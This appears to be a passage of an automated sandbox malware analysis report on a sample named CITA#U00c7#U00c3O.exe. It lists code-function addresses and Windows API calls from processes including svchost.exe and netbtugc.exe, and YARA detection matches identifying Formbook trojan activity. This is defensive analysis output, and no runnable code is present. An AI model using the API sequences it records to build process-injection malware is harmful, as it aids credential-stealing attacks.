            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_03612C70 NtFreeVirtualMemory,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_03612CA0 NtQueryInformationToken,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_036135C0 NtCreateMutant,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_036139B0 NtGetContextThread,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_03612B80 NtQueryInformationFile
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_03612AB0 NtWaitForSingleObject
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_03612F60 NtCreateProcessEx
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_03612FA0 NtQuerySection
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_03612F90 NtProtectVirtualMemory
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_03612E30 NtWriteVirtualMemory
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_03612EA0 NtAdjustPrivilegesToken
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_03612D00 NtSetInformationFile
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_03612DB0 NtEnumerateKey
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_03612C00 NtQueryInformationProcess
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_03612CF0 NtOpenProcess
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_03612CC0 NtQueryVirtualMemory
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_03613010 NtOpenDirectoryObject
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_03613090 NtSetValueKey
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_03613D70 NtOpenThread
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_03613D10 NtOpenProcessToken
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_02B78E60 NtReadFile
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_02B78F50 NtDeleteFile
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_02B78CF0 NtCreateFile
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_02B79000 NtClose
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_02B79160 NtAllocateVirtualMemory
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe | Code function: 0_2_00431BE8: GetFullPathNameW,__swprintf,_wcslen,CreateDirectoryW,CreateFileW,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe | Code function: 0_2_00446313 DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe | Code function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe | Code function: 0_2_004096A0
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe | Code function: 0_2_0042200C
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe | Code function: 0_2_0041A217
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe | Code function: 0_2_00412216
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe | Code function: 0_2_0042435D
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe | Code function: 0_2_004033C0
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe | Code function: 0_2_0044F430
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe | Code function: 0_2_004125E8
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe | Code function: 0_2_0044663B
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe | Code function: 0_2_00413801
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe | Code function: 0_2_0042096F
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe | Code function: 0_2_004129D0
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe | Code function: 0_2_004119E3
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe | Code function: 0_2_0041C9AE
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe | Code function: 0_2_0047EA6F
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe | Code function: 0_2_0040FA10
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe | Code function: 0_2_0044EB59
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe | Code function: 0_2_00423C81
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe | Code function: 0_2_00411E78
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe | Code function: 0_2_00442E0C
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe | Code function: 0_2_00420EC0
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe | Code function: 0_2_0044CF17
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe | Code function: 0_2_00444FD2
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe | Code function: 0_2_03F716B0
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe | Code function: 0_2_03F74EB8
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02688113
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02672209
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02672210
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_026862FE
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_026862BC
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02686303
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0267FBE3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0267F9C3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0267F9BC
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0269E653
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0267DC63
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02672DC0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030FA352
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0304E3F0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031003E6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030C02C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03030100
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030DA118
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030C8158
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030F41A2
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031001AA
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030F81CC
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030D2000
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03064750
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0303C7C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0305C6E0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03040535
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03100591
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030E4420
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030F2446
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030EE4F6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030FAB40
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030F6BD7
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0303EA80
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03056962
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030429A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0310A9A6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0304A840
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03042840
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030268B8
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0306E8F0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03082F28
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03060F30
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030E2F30
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030B4F40
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030BEFA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03032FC8
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030FEE26
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03040E59
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03052E90
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030FCE93
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030FEEDB
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0304AD00
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030DCD1F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03058DBF
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0303ADE0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03040C00
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030E0CB5
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03030CF2
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030F132D
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0302D34C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0308739A
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030452A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0305B2C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030E12ED
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0305D2F0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0307516C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0302F172
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0310B16B
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0304B1B0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030EF0CC
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030470C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030F70E9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030FF0E0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030FF7B0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03085630
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030F16CC
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030F7571
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030DD5B0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031095C3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030FF43F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03031460
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030FFB76
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0305FB80
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030B5BF0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0307DBF9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030FFA49
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030F7A46
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030B3A6C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030DDAAC
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03085AA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030E1AA3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030EDAC6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030D5910
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03049950
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0305B950
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030AD800
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030438E0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030FFF09
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03041F92
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030FFFB1
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03003FD2
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03003FD5
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03049EB0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03043D40
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030F1D5A
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030F7D73
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0305FDC0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030B9C32
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030FFCF2
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_0369A352
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_036A03E6
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_035EE3F0
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_03680274
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_036602C0
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_03668158
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_035D0100
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_0367A118
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_036981CC
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_036A01AA
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_03672000
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_035E0770
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_03604750
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_035DC7C0
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_035FC6E0
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_035E0535
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_036A0591
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_03692446
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_03684420
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_0368E4F6
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_0369AB40
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_03696BD7
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_035DEA80
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_035F6962
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_036AA9A6
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_035E29A0
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_035E2840
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_035EA840
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_0360E8F0
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_035C68B8
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_03654F40
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_03622F28
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_03600F30
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_03682F30
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_035D2FC8
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_0365EFA0
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_035E0E59
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_0369EE26
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_0369EEDB
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_035F2E90
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_0369CE93
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_035EAD00
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_0367CD1F
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_035DADE0
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_035F8DBF
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_035E0C00
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_035D0CF2
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_03680CB5
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_035CD34C
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_0369132D
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_0362739A
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_036812ED
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_035FB2C0
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_035FD2F0
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_035E52A0
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_036AB16B
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_0361516C
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_035CF172
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_035EB1B0
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_036970E9
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_0369F0E0
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_035E70C0
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_0368F0CC
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_0369F7B0
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_036916CC
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_03697571
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_0367D5B0
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_035D1460
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_0369F43F
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_0369FB76
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_03655BF0
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_0361DBF9
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_035FFB806_2_035FFB80
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03653A6C6_2_03653A6C
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0369FA496_2_0369FA49
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03697A466_2_03697A46
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0368DAC66_2_0368DAC6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03625AA06_2_03625AA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0367DAAC6_2_0367DAAC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03681AA36_2_03681AA3
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_035E99506_2_035E9950
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_035FB9506_2_035FB950
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_036759106_2_03675910
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0364D8006_2_0364D800
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_035E38E06_2_035E38E0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0369FF096_2_0369FF09
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_035E1F926_2_035E1F92
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0369FFB16_2_0369FFB1
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_035E9EB06_2_035E9EB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03697D736_2_03697D73
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_035E3D406_2_035E3D40
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03691D5A6_2_03691D5A
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_035FFDC06_2_035FFDC0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03659C326_2_03659C32
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0369FCF26_2_0369FCF2
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02B61A306_2_02B61A30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02B5CB806_2_02B5CB80
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02B5C9606_2_02B5C960
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02B5C9596_2_02B5C959
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02B5AC006_2_02B5AC00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02B632A06_2_02B632A0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02B6329B6_2_02B6329B
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02B632596_2_02B63259
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02B650B06_2_02B650B0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_02B7B5F06_2_02B7B5F0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0339E3386_2_0339E338
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0339E7EC6_2_0339E7EC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0339E4536_2_0339E453
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0339CB036_2_0339CB03
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0339CAAB6_2_0339CAAB
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0339D8586_2_0339D858
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 030AEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0302B970 appears 262 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 030BF290 appears 103 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03075130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03087E54 appears 107 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 0364EA12 appears 86 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 0365F290 appears 103 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 035CB970 appears 262 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 03627E54 appears 99 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 03615130 appears 58 times
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeCode function: String function: 004115D7 appears 36 times
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeCode function: String function: 00416C70 appears 39 times
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeCode function: String function: 00445AE0 appears 65 times
            Source: CITA#U00c7#U00c3O.exe, 00000000.00000003.1779116308.00000000046F3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs CITA#U00c7#U00c3O.exe
            Source: CITA#U00c7#U00c3O.exe, 00000000.00000003.1779229450.000000000489D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs CITA#U00c7#U00c3O.exe
            Source: CITA#U00c7#U00c3O.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 1.2.svchost.exe.2670000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 1.2.svchost.exe.2670000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.4151245699.0000000002B50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.4152977911.0000000003290000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.4152890125.0000000003240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
